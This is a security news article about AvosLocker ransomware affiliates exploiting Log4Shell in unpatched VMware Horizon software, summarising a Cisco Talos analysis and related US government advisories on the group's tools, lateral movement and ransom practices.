Ransomware Gang Uses Log4ShellAvosLocker Makes Use of Unpatched VMWare Virtual Desktop Software
Log4Shell is the vulnerability that keeps giving. Yet another ransomware group is at work exploiting a bug present in a ubiquitous open-source data-logging framework.
See Also: 2022 Unit 42 Incident Response Report
Analysis by Cisco Talos shows actors affiliated with ransomware-as-a-service group AvosLocker exploiting unpatched VMWare virtual desktop software containing the vulnerability.
The Apache Software Foundation in December set off a global race between systems administrators and hackers when it fixed a bug identified by security researchers in the Java-based Log4j logging utility. Despite a flurry of warnings, some systems remain open to hackers exploiting unpatched systems.
A study of a campaign involving Avos ransomware showed hackers had managed to gain access to an unidentified organization via a pair of VMWare Horizon applications (see: Log4Shell Update: VMware Horizon Targeted).
AvosLocker has been active since 2021 and follows a RaaS model - its operators handle negotiation and extortion practices for affiliates.
Typically, Avos actors use spam email campaigns as an initial infection vector to deploy ransomware. But in this case, Cisco Talos discovered that they had leveraged an exposed ESXi server on the internet over VMWare Horizon Unified Access Gateway that was vulnerable to Log4Shell.
The customer, whose network was attacked, notified Talos on March 7. But the researchers at Talos observed activity going back to Feb. 7 and found four vulnerabilities associated with Log4Shell - CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 - on the customer's network. These vulnerabilities could allow a low-privilege, non-root user remote code execution capabilities on Unified Access Gateway.
"Beyond that, the inner-transit firewalls that could control or limit the access to the internal infrastructure were not configured," they say. This allowed the attackers initial access into the network and granted them access to the internal servers.
The researchers also observed payloads and malicious tools on endpoints. The threat actors used "living off the land" binaries, meaning they used legitimate operating system local tools for malicious purposes.
Once inside the network, the threat actors executed encoded PowerShell scripts on multiple occasions. The downloaded files including open-source malware program Mimikatz, a .zip archive containing Cobalt Strike beacons and a port scanner labeled scanner.exe. Scanner.exe is a commercially available product, known as SoftPerfect Network Scanner, that Avos has used in the past.
After that, the attackers moved laterally in the network and delivered a payload.
"To proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool. Once the ransomware had been delivered, the victim's files were encrypted and a ransom note was displayed," the researchers say.
Cisco's analysis comes on the heels of an advisory from the U.S. Cybersecurity and Infrastructure Security Agency and the Coast Guard Cyber Command detailing how multiple threat actors were exploiting Log4Shell on unpatched VMware products.
AvosLocker was also the subject of a joint advisory in March from the FBI, the U.S. Treasury Department and its Financial Crimes Enforcement Network bureau, warning that the group has targeted victims across multiple critical infrastructure sectors in the U.S., including financial services, critical manufacturing and government.
Because it's a RaaS operator, AvosLockers' indicators of compromise "vary between indicators specific to AvosLocker malware and indicators specific to the individual affiliate responsible for the intrusion," the advisory says.
AvosLocker ransomware encrypts files on a victim's server and renames them with the '.avos' extension, according to the advisory. "Depending upon the affiliate, payments in Monero are preferred; however, they accept Bitcoin for a 10%-25% premium."
AvosLocker victims sometimes receive phone calls from an AvosLocker representative, and in some cases, AvosLocker actors will threaten and execute distributed denial-of-service attacks during negotiations, the advisory says.